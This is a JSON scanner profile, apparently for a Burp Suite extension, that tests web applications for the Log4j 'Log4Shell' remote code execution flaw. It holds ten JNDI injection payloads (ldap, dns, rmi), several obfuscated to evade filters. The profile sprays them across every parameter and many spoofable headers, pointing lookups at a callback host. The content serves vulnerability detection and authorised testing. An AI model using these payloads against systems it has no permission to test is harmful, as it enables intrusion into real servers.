[
  {
    "profile_name": "RCE_Log4j_GETPOST",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,${jndi:ldap://{BH}/b}",
          "true,$%7Bjndi:ldap://{BH}/b%7D",
          "true,${jndi:dns://{BH}/b}",
          "true,${jndi:${lower:l}${lower:d}a${lower:p}://{BH}/b}",
          "true,${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{BH}/aa}",
          "true,${${::-j}ndi:rmi://{BH}/aa}",
          "true,${jnd${123%25ff:-${123%25ff:-i:}}ldap://{BH}/o}",
          "true,${jndi${123%25ff:-}:ldap://{BH}/a}",
          "true,${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}{BH}//a}",
          "true,${jndi:ldap://127.0.0.1#{BH}/a}"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": true,
        "change_http_request_type": "get_post_get",
        "insertion_points": [
          "all",
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "host",
          "content_type",
          "accept",
          "accept_language",
          "accept_encoding",
          "new_headers",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": true,
        "new_headers": [
          "X-Forwarded-For",
          "X-Host",
          "X-Forwarded-Server",
          "X-Forwarded-Scheme",
          "X-Original-URL",
          "X-Rewrite-URL",
          "Forwarded",
          "Origin",
          "Referer",
          "X-Forwarded-Host",
          "X-Forwarded-Proto",
          "X-ProxyUser-Ip",
          "X-Wap-Profile",
          "Client-IP",
          "True-Client-IP"
        ],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Blind Host,,"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "RCE_Log4j_GETPOST",
        "issue_severity": "High",
        "issue_confidence": "Firm",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "RCE",
      "All"
    ]
  }
]